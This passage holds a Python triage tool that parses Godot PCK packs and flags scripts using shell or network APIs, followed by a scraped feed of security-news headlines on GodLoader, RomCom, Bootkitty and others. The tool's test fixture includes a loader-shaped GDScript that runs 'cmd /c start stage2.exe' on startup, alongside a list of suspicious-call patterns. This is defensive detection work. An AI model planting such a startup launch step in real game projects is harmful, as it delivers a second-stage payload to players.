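SUSPICIOUS_CALLS = (b"OS.execute", b"OS.create_process", b"HTTPRequest", b"HTTPClient",
                    b"OS.get_environment", b"OS.shell_open")


def parse_pck(blob: bytes) -> list:
    """Return the directory of a version-1 pack as dicts with path/offset/size/md5."""
    magic, version, _major, _minor, _rev = struct.unpack_from("<5I", blob, 0)
    if magic != PCK_MAGIC:
        raise ValueError("not a Godot pack (bad magic)")
    if version != 1:
        raise ValueError(f"pack format version {version} is not handled by this parser")
    off = 20 + 16 * 4                                   # header + reserved words
    (count,) = struct.unpack_from("<I", blob, off); off += 4
    entries = []
    for _ in range(count):
        (plen,) = struct.unpack_from("<I", blob, off); off += 4
        path = blob[off:off + plen].rstrip(b"\0").decode("utf-8"); off += plen
        offset, size = struct.unpack_from("<QQ", blob, off); off += 16
        md5 = blob[off:off + 16].hex(); off += 16
        entries.append({"path": path, "offset": offset, "size": size, "md5": md5})
    return entries


def triage(blob: bytes) -> list:
    """Per bundled file: directory entry, MD5 check, script flag and matched API names."""
    report = []
    for entry in parse_pck(blob):
        data = blob[entry["offset"]:entry["offset"] + entry["size"]]
        is_script = entry["path"].endswith((".gd", ".gdc"))
        report.append(dict(entry,
                           md5_ok=hashlib.md5(data).hexdigest() == entry["md5"],
                           is_script=is_script,
                           suspicious=[c.decode() for c in SUSPICIOUS_CALLS if c in data] if is_script else []))
    return report


def build_pck(files: dict, engine=(3, 5, 0)) -> bytes:
    """Write a version-1 pack (header, directory, then file bodies) for test data."""
    def padded(path: str) -> bytes:
        raw = path.encode("utf-8")
        return raw + b"\0" * (-len(raw) % 4)
    names = {p: padded(p) for p in files}
    header_size = 20 + 64 + 4
    dir_size = sum(4 + len(n) + 8 + 8 + 16 for n in names.values())
    body_off = header_size + dir_size
    directory, body = b"", b""
    for path, data in files.items():
        directory += struct.pack("<I", len(names[path])) + names[path]
        directory += struct.pack("<QQ", body_off + len(body), len(data)) + hashlib.md5(data).digest()
        body += data
    header = struct.pack("<5I", PCK_MAGIC, 1, *engine) + b"\0" * 64 + struct.pack("<I", len(files))
    return header + directory + body


# Constructed sample: one asset, one ordinary script, one loader-shaped script.
SAMPLE_PCK = build_pck({
    "res://icon.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 16,
    "res://player.gd": b"extends KinematicBody2D\nfunc _ready():\n\tprint('hello')\n",
    "res://boot.gd": (b"extends Node\nfunc _ready():\n\tvar r = HTTPRequest.new()\n"
                      b"\tOS.execute('cmd', ['/c', 'start stage2.exe'])\n"),
})

if __name__ == "__main__":
    for row in triage(SAMPLE_PCK):
        kind = "script" if row["is_script"] else "asset"
        print(f"{row['path']:<18} {kind:<6} md5={'ok' if row['md5_ok'] else 'MISMATCH'} {row['suspicious']}")
```

A script flagged here still has to be read: the engine exposes these calls to every legitimate game too, so the lead is a .gd that reaches out to the network or the shell from _ready() in a pack that arrived outside a normal game install.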
Cybercriminals Exploit Popular Game Engine Godot to Distribute Cross-Platform Malware A popular open-source game engine called Godot Engine is being misused as part of a new GodLoader malware campaign, infecting over 17,000 systems since at least June 2024. "Cybercriminals have been taking advantage of Godot Engine to execute crafted GDScript code which triggers malicious commands and delivers malware," Check Point said in a new analysis published Wednesday. "The technique 2024-11-28T14:59:00+00:00 https://thehackernews.com/2024/11/cybercriminals-exploit-popular-game.html www.secnews.physaphae.fr/article.php?IdArticle=8618136 False Malware,Threat None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Malicious Actors Exploit ProjectSend Critical Vulnerability This vulnerability was patched in May 2024 but was only allocated a CVE in November after evidence of exploitation 2024-11-28T13:00:00+00:00 https://www.infosecurity-magazine.com/news/exploit-projectsend-critical/ www.secnews.physaphae.fr/article.php?IdArticle=8618150 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) CISA says BianLian Ransomware Now Focuses Only on Data Theft 2024-11-27T20:21:51+00:00 https://community.riskiq.com/article/c958d17f www.secnews.physaphae.fr/article.php?IdArticle=8618094 False Ransomware,Tool,Threat APT 45 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, right?) APT-C-60 Exploits WPS Office Vulnerability to Deploy SpyGlace Backdoor The threat actor known as APT-C-60 has been linked to a cyber attack targeting an unnamed organization in Japan that used a job application-themed lure to deliver the SpyGlace backdoor. That's according to findings from JPCERT/CC, which said the intrusion leveraged legitimate services like Google Drive, Bitbucket, and StatCounter. The attack was carried out around August 2024.
"In this attack, 2024-11-27T16:44:00+00:00 https://thehackernews.com/2024/11/apt-c-60-exploits-wps-office.html www.secnews.physaphae.fr/article.php?IdArticle=8618004 False Vulnerability,Threat None 2.0000000000000000 HackRead - Chercher Cyber Russian Hackers Exploit Firefox and Windows 0-Days to Deploy Backdoor Watch out for the Russian hackers from the infamous RomCom group, also known as Storm-0978, Tropical Scorpius, or UNC2596, and their use of a custom backdoor. 2024-11-27T16:15:07+00:00 https://hackread.com/russian-hackers-firefox-windows-0-days-backdoor/ www.secnews.physaphae.fr/article.php?IdArticle=8618061 False Threat None 2.0000000000000000 Netskope - Netskope is an American software company providing an IT security platform Netskope Threat Labs Predictions for 2025 Continuing our ongoing series collecting predictions from our many subject-matter experts here at Netskope, we gathered some hot topics and predictions from the Netskope Threat Labs team based on what they are starting to see evolving in the landscape. Here's what they had to say: The great AI crackdown Ray Canzanese, Director of Netskope Threat […]
2024-11-27T15:00:00+00:00 https://www.netskope.com/blog/netskope-threat-labs-predictions-for-2025 www.secnews.physaphae.fr/article.php?IdArticle=8618044 False Threat,Prediction None 3.0000000000000000
Korben - French blogger Bootkitty - Discovery of the 1st Linux UEFI bootkit Today we are going to dive into the dark innards of Linux to discover something particularly interesting: Bootkitty, the first bootkit designed specifically to infiltrate our beloved free systems. You should know that until now, bootkits (those malicious programs that embed themselves in the boot process) were the exclusive preserve of the Windows world. It all started in 2012 with a first proof of concept (PoC) by Andrea Allievi, followed by other attempts such as EfiGuard or Boot Backdoor; then in 2021 the first UEFI bootkits appeared in the wild with ESPecter and FinSpy, followed by BlackLotus in 2023, which pulled off the feat of bypassing Secure Boot. But all of these clever little things only targeted Windows. Ha ha ha! "Chè", as the saying goes. 2024-11-27T14:49:48+00:00 https://korben.info/bootkitty-premier-bootkit-linux-demasque-recherche.html www.secnews.physaphae.fr/article.php?IdArticle=8618036 False Threat None 1.00000000000000000000 ProofPoint - Cyber Firms 7 Takeaways About Identity Security From Proofpoint Protect 2024 2024-11-27T14:28:49+00:00 https://www.proofpoint.com/us/blog/insider-threat-management/identity-security-takeaways-from-protect-2024 www.secnews.physaphae.fr/article.php?IdArticle=8618018 False Tool,Vulnerability,Threat,Conference None 3.0000000000000000 Dark Reading - Informationweek Branch Russian Script Kiddie Assembles Massive DDoS Botnet Over the past year, "Matrix" has used publicly available malware tools and exploit scripts to target weakly secured IoT devices - and enterprise servers. 2024-11-27T14:00:00+00:00 https://www.darkreading.com/cyberattacks-data-breaches/russian-script-kiddie-assembles-massive-ddos-botnet www.secnews.physaphae.fr/article.php?IdArticle=8618027 False Malware,Tool,Threat None 2.0000000000000000 We Live Security - ESET antivirus software publisher Bootkitty marks a new chapter
in the evolution of UEFI threats ESET researchers make a discovery that signals a shift in the UEFI threat landscape and underscores the need for vigilance against future threats 2024-11-27T13:16:11+00:00 https://www.welivesecurity.com/en/videos/bootkitty-new-chapter-uefi-threats/ www.secnews.physaphae.fr/article.php?IdArticle=8648732 False Threat None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Russian RomCom APT Group Leverages Zero-Day Flaws in Firefox and Windows Russia-backed hackers, known as RomCom, have exploited critical zero-day vulnerabilities in Mozilla Firefox and Windows to launch targeted attacks 2024-11-27T11:00:00+00:00 https://www.infosecurity-magazine.com/news/romcom-apt-zeroday-flaws-firefox/ www.secnews.physaphae.fr/article.php?IdArticle=8617997 False Vulnerability,Threat None 2.0000000000000000 The Hacker News - The Hacker News is a hacking news blog (surprising, right?) Matrix Botnet Exploits IoT Devices in Widespread DDoS Botnet Campaign A threat actor named Matrix has been linked to a widespread distributed denial-of-service (DDoS) campaign that leverages vulnerabilities and misconfigurations in Internet of Things (IoT) devices to co-opt them into a disruptive botnet. "This operation serves as a comprehensive one-stop shop for scanning, exploiting vulnerabilities, deploying malware, and setting up shop kits, showcasing a 2024-11-27T10:51:00+00:00 https://thehackernews.com/2024/11/matrix-botnet-exploits-iot-devices-in.html www.secnews.physaphae.fr/article.php?IdArticle=8617968 False Malware,Vulnerability,Threat None 2.0000000000000000 InformationSecurityBuzzNews - Security News Site VPN Vulnerabilities Drive Nearly 30% of Q3 Ransomware Attacks Attackers leveraging vulnerabilities in Virtual Private Networks (VPNs) and exploiting weak passwords accounted for 28.7% of ransomware incidents in Q3 2024, according to Corvus Insurance's latest Cyber Threat Report.
Common credentials like “admin” and a lack of multi-factor authentication (MFA) left VPN systems vulnerable to automated brute-force attacks, highlighting the need for improved basic cyber [...] 2024-11-27T06:26:10+00:00 https://informationsecuritybuzz.com/vpn-vulnerabilities-q3-ransomware/ www.secnews.physaphae.fr/article.php?IdArticle=8617972 False Ransomware,Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) RomCom Threat Group Exploits Zero-Day Vulnerabilities in Firefox and Windows 2024-11-27T02:12:54+00:00 https://community.riskiq.com/article/2b93a4d2 www.secnews.physaphae.fr/article.php?IdArticle=8617963 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching None 3.0000000000000000 Intigriti - Blog The cyber threat landscape part 4: Emerging technologies and their security implications As organizations continue adopting emerging technologies, they gain immense benefits but also face new security challenges. Cloud computing, AI, IoT, and blockchain are reshaping the cyber threat landscape, introducing powerful tools for defenders along with vulnerabilities for attackers to exploit.
In this post, we explore how these technologies impact cybersecurity, the uniqu… 2024-11-27T00:00:00+00:00 https://blog.intigriti.com/business-insights/the-cyber-threat-landscape-part-4-emerging-technologies-and-their-security-implic www.secnews.physaphae.fr/article.php?IdArticle=8618054 False Tool,Vulnerability,Threat,Cloud None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) Rockstar 2FA: A Driving Force in Phishing-as-a-Service (PaaS) 2024-11-26T21:59:55+00:00 https://community.riskiq.com/article/7dae7a55 www.secnews.physaphae.fr/article.php?IdArticle=8617947 False Spam,Malware,Tool,Threat,Mobile None 2.0000000000000000 Dark Reading - Informationweek Branch 'RomCom' APT Mounts Zero-Day, Zero-Click Browser Escapes in Firefox, Tor The innocuously named Russian-sponsored cyber threat actor has combined critical and serious vulnerabilities in Windows and Firefox products in a zero-click code execution exploit. 2024-11-26T21:36:42+00:00 https://www.darkreading.com/application-security/romcom-apt-zero-day-zero-click-browser-escapes-firefox-tor www.secnews.physaphae.fr/article.php?IdArticle=8617943 False Vulnerability,Threat None 3.0000000000000000 RedCanary - Red Canary Safeguard your identities with Red Canary + CrowdStrike Falcon® Identity Protection Stay ahead of modern adversaries with real-time identity monitoring, threat detection, and response from Red Canary and CrowdStrike Falcon 2024-11-26T21:07:22+00:00 https://redcanary.com/blog/product-updates/crowdstrike-falcon-identity-protection-integration/ www.secnews.physaphae.fr/article.php?IdArticle=8617935 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) CyberVolk: A Deep Dive into the Hacktivists, Tools and Ransomware Fueling Pro-Russian Cyber Attacks 2024-11-26T21:02:38+00:00 https://community.riskiq.com/article/db8b4022 www.secnews.physaphae.fr/article.php?IdArticle=8617948 False Ransomware,Malware,Tool,Threat,Industrial None 3.0000000000000000 RiskIQ -
cyber risk firms (now microsoft) DPRK IT Workers | A Network of Active Front Companies and Their Links to China 2024-11-26T20:22:49+00:00 https://community.riskiq.com/article/d3dd2b00 www.secnews.physaphae.fr/article.php?IdArticle=8617941 False Tool,Threat,Mobile None 2.0000000000000000